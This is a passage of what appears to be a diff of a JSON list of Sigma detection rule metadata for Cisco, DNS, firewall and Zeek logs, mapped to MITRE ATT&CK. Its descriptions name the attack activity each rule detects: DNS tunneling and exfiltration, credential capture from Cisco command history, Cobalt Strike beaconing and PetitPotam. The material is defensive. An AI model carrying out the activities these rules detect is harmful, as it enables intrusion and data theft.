- "creation_date": "2019/08/11", - "filename": "cisco_cli_disable_logging.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Find information about network devices that is not stored in config files", - "uuid": "9705a6a1-6db6-4a16-a987-15b7151e299b", - "value": "Cisco Discovery", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_discovery.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1083", - "attack.t1201", - "attack.t1057", - "attack.t1018", - "attack.t1082", - "attack.t1016", - "attack.t1049", - "attack.t1033", - "attack.t1124" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_discovery.yml", - "author": "Austin Clark", - "level": "low", - "falsepositive": [ - "Commonly used by administrators for troubleshooting" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Detect a system being shutdown or put into different boot mode", - "uuid": "d94a35f0-7a29-45f6-90a0-80df6159967c", - "value": "Cisco Denial of Service", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_dos.yml" - ], - "tags": [ - "attack.impact", - "attack.t1495", - "attack.t1529", - "attack.t1565.001" - ], - "creation_date": "2019/08/15", - "filename": "cisco_cli_dos.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Legitimate administrators may run these commands, though rarely." - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "See what files are being deleted from flash file systems", - "uuid": "71d65515-c436-43c0-841b-236b1f32c21e", - "value": "Cisco File Deletion", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_file_deletion.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1070.004", - "attack.t1561.001", - "attack.t1561.002" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_file_deletion.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Will be used sometimes by admins to clean up local flash space" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "See what commands are being input into the device by other people, full credentials can be in the history", - "uuid": "b094d9fb-b1ad-4650-9f1a-fb7be9f1d34b", - "value": "Cisco Show Commands Input", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_input_capture.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1552.003" - ], - "creation_date": "2019/08/11", - "filename": "cisco_cli_input_capture.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Not commonly run by administrators, especially if remote logging is configured" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Find local accounts being created or modified as well as remote authentication configurations", - "uuid": "6d844f0f-1c18-41af-8f19-33e7654edfc3", - "value": "Cisco Local Accounts", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_local_accounts.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001", - "attack.t1098" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_local_accounts.yml", - "author": "Austin Clark", - "level": "high", - "falsepositive": [ - "When remote authentication is in place, this should not change often" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Modifications to a config that will serve an adversary's impacts or persistence", - "uuid": "671ffc77-50a7-464f-9e3d-9ea2b493b26b", - "value": "Cisco Modify Configuration", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_modify_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.impact", - "attack.t1490", - "attack.t1505", - "attack.t1565.002", - "attack.t1053" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_modify_config.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Legitimate administrators may run these commands" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Various protocols maybe used to put data on the device for exfil or infil", - "uuid": "5e51acb2-bcbe-435b-99c6-0e3cd5e2aa59", - "value": "Cisco Stage Data", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_moving_data.yml" - ], - "tags": [ - "attack.collection", - "attack.lateral_movement", - "attack.command_and_control", - "attack.exfiltration", - "attack.t1074", - "attack.t1105", - "attack.t1560.001" - ], - "creation_date": "2019/08/12", - "filename": "cisco_cli_moving_data.yml", - "author": "Austin Clark", - "level": "low", - "falsepositive": [ - "Generally used to copy configs or IOS images" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Show when a monitor or a span/rspan is setup or modified", - "uuid": "b9e1f193-d236-4451-aaae-2f3d2102120d", - "value": "Cisco Sniffing", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/cisco/aaa/cisco_cli_net_sniff.yml" - ], - "tags": [ - "attack.credential_access", - "attack.discovery", - "attack.t1040" - ], - "creation_date": "2019/08/11", - "filename": "cisco_cli_net_sniff.yml", - "author": "Austin Clark", - "level": "medium", - "falsepositive": [ - "Admins may setup new or modify old spans, or use a monitor for troubleshooting" - ], - "logsource.category": "accounting", - "logsource.product": "cisco" - } - }, - { - "description": "Normally, DNS logs contain a limited amount of different dns queries for a single domain. This rule detects a high amount of queries for a single domain, which can be an indicator that DNS is used to transfer data.", - "uuid": "1ec4b281-aa65-46a2-bdae-5fd830ed914e", - "value": "Possible DNS Tunneling", - "meta": { - "refs": [ - "https://zeltser.com/c2-dns-tunneling/", - "https://patrick-bareiss.com/detect-c2-traffic-over-dns-using-sigma/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_c2_detection.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004", - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2019/04/07", - "filename": "net_dns_c2_detection.yml", - "author": "Patrick Bareiss", - "level": "high", - "falsepositive": [ - "Valid software, which uses dns for transferring data" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries to external service interaction domains often used for out-of-band interactions after successful RCE", - "uuid": "aff715fa-4dd5-497a-8db3-910bea555566", - "value": "DNS Query to External Service Interaction Domains", - "meta": { - "refs": [ - "https://twitter.com/breakersall/status/1533493587828260866", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_external_service_interaction_domains.yml" - ], - "tags": [ - "attack.initial_access", - "attack.t1190", - "attack.reconnaissance", - "attack.t1595.002" - ], - "creation_date": "2022/06/07", - "filename": "net_dns_external_service_interaction_domains.yml", - "author": "Florian Roth, Matt Kelly (list of domains)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "uuid": "0f6c1bf5-70a5-4963-aef9-aab1eefb50bd", - "value": "High DNS Bytes Out", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_bytes_out.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Extremely high rate of NULL record type DNS requests from host per short period of time. Possible result of iodine tool execution", - "uuid": "44ae5117-9c44-40cf-9c7c-7edad385ca70", - "value": "High NULL Records Requests Rate", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_null_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_null_records_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS NULL requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS requests amount from host per short period of time", - "uuid": "b4163085-4001-46a3-a79a-55d8bbbc7a3a", - "value": "High DNS Requests Rate", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Extremely high rate of TXT record type DNS requests from host per short period of time. Possible result of Do-exfiltration tool execution", - "uuid": "f0a8cedc-1d22-4453-9c44-8d9f4ebd5d35", - "value": "High TXT Records Requests Rate", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_high_txt_records_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_dns_high_txt_records_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS TXT requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries known from Cobalt Strike beacons", - "uuid": "2975af79-28c4-4d2f-a951-9095f229df29", - "value": "Cobalt Strike DNS Beaconing", - "meta": { - "refs": [ - "https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns", - "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_mal_cobaltstrike.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/05/10", - "filename": "net_dns_mal_cobaltstrike.yml", - "author": "Florian Roth", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries to Monero mining pools", - "uuid": "b593fd50-7335-4682-a36c-4edcb68e4641", - "value": "Monero Crypto Coin Mining Pool Lookup", - "meta": { - "refs": [ - "https://www.nextron-systems.com/2021/10/24/monero-mining-pool-fqdns/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_pua_cryptocoin_mining_xmr.yml" - ], - "tags": [ - "attack.impact", - "attack.t1496", - "attack.t1567" - ], - "creation_date": "2021/10/24", - "filename": "net_dns_pua_cryptocoin_mining_xmr.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Legitimate crypto coin mining" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries using base64 encoding", - "uuid": "4153a907-2451-4e4f-a578-c52bb6881432", - "value": "Suspicious DNS Query with B64 Encoded String", - "meta": { - "refs": [ - "https://github.com/krmaxwell/dns-exfiltration", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_b64_queries.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/05/10", - "filename": "net_dns_susp_b64_queries.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind", - "uuid": "c64c5175-5189-431b-a55e-6d9882158251", - "value": "Telegram Bot API Request", - "meta": { - "refs": [ - "https://core.telegram.org/bots/faq", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", - "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", - "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_telegram_api.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1102.002" - ], - "creation_date": "2018/06/05", - "filename": "net_dns_susp_telegram_api.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate use of Telegram bots in the company" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects strings used in command execution in DNS TXT Answer", - "uuid": "8ae51330-899c-4641-8125-e39f2e07da72", - "value": "DNS TXT Answer with Possible Execution Strings", - "meta": { - "refs": [ - "https://twitter.com/stvemillertime/status/1024707932447854592", - "https://github.com/samratashok/nishang/blob/414ee1104526d7057f9adaeee196d91ae447283e/Backdoors/DNS_TXT_Pwnage.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_susp_txt_exec_strings.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2018/08/08", - "filename": "net_dns_susp_txt_exec_strings.yml", - "author": "Markus Neis", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects wannacry killswitch domain dns queries", - "uuid": "3eaf6218-3bed-4d8a-8707-274096f12a18", - "value": "Wannacry Killswitch Domain", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/products-and-services/2017/05/wannacry-ransomware-campaign.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/dns/net_dns_wannacry_killswitch_domain.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071.001" - ], - "creation_date": "2020/09/16", - "filename": "net_dns_wannacry_killswitch_domain.yml", - "author": "Mike Wade", - "level": "high", - "falsepositive": [ - "Analyst testing" - ], - "logsource.category": "dns", - "logsource.product": "No established product" - } - }, - { - "description": "Detects communication to C2 servers mentioned in the operational notes of the ShadowBroker leak of EquationGroup C2 tools", - "uuid": "881834a4-6659-4773-821e-1c151789d873", - "value": "Equation Group C2 Communication", - "meta": { - "refs": [ - "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation", - "https://medium.com/@msuiche/the-nsa-compromised-swift-network-50ec3000b195", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_apt_equationgroup_c2.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.g0020", - "attack.t1041" - ], - "creation_date": "2017/04/15", - "filename": "net_firewall_apt_equationgroup_c2.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS queries bytes amount from host per short period of time", - "uuid": "3b6e327d-8649-4102-993f-d25786481589", - "value": "High DNS Bytes Out - Firewall", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_bytes_out.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003" - ], - "creation_date": "2019/10/24", - "filename": "net_firewall_high_dns_bytes_out.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS bytes out rate to domain name which should be added to whitelist" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "High DNS requests amount from host per short period of time", - "uuid": "51186749-7415-46be-90e5-6914865c825a", - "value": "High DNS Requests Rate - Firewall", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_high_dns_requests_rate.yml" - ], - "tags": [ - "attack.exfiltration", - "attack.t1048.003", - "attack.command_and_control", - "attack.t1071.004" - ], - "creation_date": "2019/10/24", - "filename": "net_firewall_high_dns_requests_rate.yml", - "author": "Daniil Yugoslavskiy, oscd.community", - "level": "medium", - "falsepositive": [ - "Legitimate high DNS requests rate to domain name which should be added to whitelist" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Detects many failed connection attempts to different ports or hosts", - "uuid": "4601eaec-6b45-4052-ad32-2d96d26ce0d8", - "value": "Network Scans Count By Destination IP", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_ip.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2017/02/19", - "filename": "net_firewall_susp_network_scan_by_ip.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Inventarization systems", - "Vulnerability scans" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Detects many failed connection attempts to different ports or hosts", - "uuid": "fab0ddf0-b8a9-4d70-91ce-a20547209afb", - "value": "Network Scans Count By Destination Port", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/firewall/net_firewall_susp_network_scan_by_port.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1046" - ], - "creation_date": "2017/02/19", - "filename": "net_firewall_susp_network_scan_by_port.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Inventarization systems", - "Vulnerability scans" - ], - "logsource.category": "firewall", - "logsource.product": "No established product" - } - }, - { - "description": "Domain user and group enumeration via network reconnaissance.\nSeen in APT 29 and other common tactics and actors. Detects a set of RPC (remote procedure calls) used to enumerate a domain controller.\nThe rule was created based off the datasets and hackathon from https://github.com/OTRF/detection-hackathon-apt29\n", - "uuid": "66a0bdc6-ee04-441a-9125-99d2eb547942", - "value": "Domain User Enumeration Network Recon 01", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/OTRF/detection-hackathon-apt29/issues/37", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_domain_user_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002", - "attack.t1082" - ], - "creation_date": "2020/05/03", - "filename": "zeek_dce_rpc_domain_user_enumeration.yml", - "author": "Nate Guagenti (@neu5ron), Open Threat Research (OTR)", - "level": "medium", - "falsepositive": [ - "Devices that may do authentication like a VPN or a firewall that looksup IPs to username", - "False positives depend on scripts and administrative tools used in the monitored environment" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Windows DCE-RPC functions which indicate an execution techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE", - "uuid": "b640c0b8-87f8-4daa-aef8-95a24261dd1d", - "value": "MITRE BZAR Indicators for Execution", - "meta": { - "refs": [ - "https://github.com/mitre-attack/bzar#indicators-for-attck-execution", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1047", - "attack.t1053.002", - "attack.t1569.002" - ], - "creation_date": "2020/03/19", - "filename": "zeek_dce_rpc_mitre_bzar_execution.yml", - "author": "@neu5ron, SOC Prime", - "level": "medium", - "falsepositive": [ - "Windows administrator tasks or troubleshooting", - "Windows management scripts or software" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Windows DCE-RPC functions which indicate a persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.", - "uuid": "53389db6-ba46-48e3-a94c-e0f2cefe1583", - "value": "MITRE BZAR Indicators for Persistence", - "meta": { - "refs": [ - "https://github.com/mitre-attack/bzar#indicators-for-attck-persistence", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_mitre_bzar_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.004" - ], - "creation_date": "2020/03/19", - "filename": "zeek_dce_rpc_mitre_bzar_persistence.yml", - "author": "@neu5ron, SOC Prime", - "level": "medium", - "falsepositive": [ - "Windows administrator tasks or troubleshooting", - "Windows management scripts or software" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects usage of the windows RPC library Encrypting File System Remote Protocol (MS-EFSRPC). Variations of this RPC are used within the attack refereed to as PetitPotam.\nThe usage of this RPC function should be rare if ever used at all.\nThus usage of this function is uncommon enough that any usage of this RPC function should warrant further investigation to determine if it is legitimate.\n View surrounding logs (within a few minutes before and after) from the Source IP to. Logs from from the Source IP would include dce_rpc, smb_mapping, smb_files, rdp, ntlm, kerberos, etc..'\n", - "uuid": "4096842a-8f9f-4d36-92b4-d0b2a62f9b2a", - "value": "Potential PetitPotam Attack Via EFS RPC Calls", - "meta": { - "refs": [ - "https://github.com/topotam/PetitPotam/blob/d83ac8f2dd34654628c17490f99106eb128e7d1e/PetitPotam/PetitPotam.cpp", - "https://msrc.microsoft.com/update-guide/vulnerability/ADV210003", - "https://vx-underground.org/archive/Symantec/windows-vista-network-attack-07-en.pdf", - "https://threatpost.com/microsoft-petitpotam-poc/168163/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml" - ], - "tags": [ - "attack.t1557.001", - "attack.t1187" - ], - "creation_date": "2021/08/17", - "filename": "zeek_dce_rpc_potential_petit_potam_efs_rpc_call.yml", - "author": "@neu5ron, @Antonlovesdnb, Mike Remen", - "level": "medium", - "falsepositive": [ - "Uncommon but legitimate windows administrator or software tasks that make use of the Encrypting File System RPC Calls. Verify if this is common activity (see description)." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the remote installation of a print driver which is possible indication of the exploitation of PrintNightmare (CVE-2021-1675).\nThe occurrence of print drivers being installed remotely via RPC functions should be rare, as print drivers are normally installed locally and or through group policy.\n", - "uuid": "7b33baef-2a75-4ca3-9da4-34f9a15382d8", - "value": "Possible PrintNightmare Print Driver Install", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-par/93d1915d-4d9f-4ceb-90a7-e8f2a59adc29", - "https://github.com/zeek/zeek/blob/691b099de13649d6576c7b9d637f8213ff818832/scripts/base/protocols/dce-rpc/consts.zeek", - "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527", - "https://github.com/corelight/CVE-2021-1675", - "https://old.zeek.org/zeekweek2019/slides/bzar.pdf", - "https://www.crowdstrike.com/blog/cve-2021-1678-printer-spooler-relay-security-advisory/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_printnightmare_print_driver_install.yml" - ], - "tags": [ - "attack.execution", - "cve.2021.1678", - "cve.2021.1675", - "cve.2021.34527" - ], - "creation_date": "2021/08/23", - "filename": "zeek_dce_rpc_printnightmare_print_driver_install.yml", - "author": "@neu5ron (Nate Guagenti)", - "level": "medium", - "falsepositive": [ - "Legitimate remote alteration of a printer driver." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the use of the spoolss named pipe over SMB. This can be used to trigger the authentication via NTLM of any machine that has the spoolservice enabled.", - "uuid": "bae2865c-5565-470d-b505-9496c87d0c30", - "value": "SMB Spoolss Name Piped Usage", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://dirkjanm.io/a-different-way-of-abusing-zerologon/", - "https://twitter.com/_dirkjan/status/1309214379003588608", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dce_rpc_smb_spoolss_named_pipe.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2018/11/28", - "filename": "zeek_dce_rpc_smb_spoolss_named_pipe.yml", - "author": "OTR (Open Threat Research), @neu5ron", - "level": "medium", - "falsepositive": [ - "Domain Controllers that are sometimes, commonly although should not be, acting as printer servers too" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects the presence of default Cobalt Strike certificate in the HTTPS traffic", - "uuid": "7100f7e3-92ce-4584-b7b7-01b40d3d4118", - "value": "Default Cobalt Strike Certificate", - "meta": { - "refs": [ - "https://sergiusechel.medium.com/improving-the-network-based-detection-of-cobalt-strike-c2-servers-in-the-wild-while-reducing-the-6964205f6468", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_default_cobalt_strike_certificate.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.s0154" - ], - "creation_date": "2021/06/23", - "filename": "zeek_default_cobalt_strike_certificate.yml", - "author": "Bhabesh Raj", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Identifies clients that may be performing DNS lookups associated with common currency mining pools.", - "uuid": "bf74135c-18e8-4a72-a926-0e4f47888c19", - "value": "DNS Events Related To Mining Pools", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/fa0411f9424b6c47b4d5a20165e4f1b168c1f103/Detections/ASimDNS/imDNS_Miners.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_mining_pools.yml" - ], - "tags": [ - "attack.t1569.002", - "attack.t1496" - ], - "creation_date": "2021/08/19", - "filename": "zeek_dns_mining_pools.yml", - "author": "Saw Winn Naung, Azure-Sentinel, @neu5ron", - "level": "low", - "falsepositive": [ - "A DNS lookup does not necessarily mean a successful attempt, verify a) if there was a response using the zeek answers field, if there was then verify the connections (conn.log) to those IPs. b) verify if HTTP, SSL, or TLS activity to the domain that was queried. http.log field is 'host' and ssl/tls is 'server_name'." - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "NKN is a networking service using blockchain technology to support a decentralized network of peers. While there are legitimate uses for it, it can also be used as a C2 channel. This rule looks for a DNS request to the ma>", - "uuid": "fa7703d6-0ee8-4949-889c-48c84bc15b6f", - "value": "New Kind of Network (NKN) Detection", - "meta": { - "refs": [ - "https://github.com/nknorg/nkn-sdk-go", - "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", - "https://github.com/Maka8ka/NGLite", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_nkn.yml" - ], - "tags": [ - "attack.command_and_control" - ], - "creation_date": "2022/04/21", - "filename": "zeek_dns_nkn.yml", - "author": "Michael Portera (@mportatoes)", - "level": "low", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "The DNS Z flag is bit within the DNS protocol header that is, per the IETF design, meant to be used reserved (unused).\nAlthough recently it has been used in DNSSec, the value being set to anything other than 0 should be rare.\nOtherwise if it is set to non 0 and DNSSec is being used, then excluding the legitimate domains is low effort and high reward.\nDetermine if multiple of these files were accessed in a short period of time to further enhance the possibility of seeing if this was a one off or the possibility of larger sensitive file gathering.\nThis Sigma query is designed to accompany the Corelight Threat Hunting Guide, which can be found here: https://www3.corelight.com/corelights-introductory-guide-to-threat-hunting-with-zeek-bro-logs'\n", - "uuid": "ede05abc-2c9e-4624-9944-9ff17fdc0bf5", - "value": "Suspicious DNS Z Flag Bit Set", - "meta": { - "refs": [ - "https://twitter.com/neu5ron/status/1346245602502443009", - "https://tdm.socprime.com/tdm/info/eLbyj4JjI15v#sigma", - "https://tools.ietf.org/html/rfc2929#section-2.1", - "https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_susp_zbit_flag.yml" - ], - "tags": [ - "attack.t1095", - "attack.t1571", - "attack.command_and_control" - ], - "creation_date": "2021/05/04", - "filename": "zeek_dns_susp_zbit_flag.yml", - "author": "@neu5ron, SOC Prime Team, Corelight", - "level": "medium", - "falsepositive": [ - "Internal or legitimate external domains using DNSSec. Verify if these are legitimate DNSSec domains and then exclude them.", - "If you work in a Public Sector then it may be good to exclude things like endswith \".edu\", \".gov\" and or \".mil\"" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Identifies IPs performing DNS lookups associated with common Tor proxies.", - "uuid": "a8322756-015c-42e7-afb1-436e85ed3ff5", - "value": "DNS TOR Proxies", - "meta": { - "refs": [ - "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/ASimDNS/imDNS_TorProxies.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_dns_torproxy.yml" - ], - "tags": [ - "attack.t1048" - ], - "creation_date": "2021/08/15", - "filename": "zeek_dns_torproxy.yml", - "author": "Saw Winn Naung , Azure-Sentinel", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "zeek" - } - }, - { - "description": "Detects executable access via webdav6. Can be seen in APT 29 such as from the emulated APT 29 hackathon https://github.com/OTRF/detection-hackathon-apt29/", - "uuid": "aac2fd97-bcba-491b-ad66-a6edf89c71bf", - "value": "Executable from Webdav", - "meta": { - "refs": [ - "http://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html", - "https://github.com/OTRF/detection-hackathon-apt29", - "https://github.com/SigmaHQ/sigma/tree/master/rules/network/zeek/zeek_http_executable_download_from_webdav.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "creation_date": "2020/05/01", - "filename": "zeek_http_executable_download_from_webdav.yml", - "author": "SOC Prime, Adam Swan", - "level": "medium", - "falsepositive": [ - "Unknown" 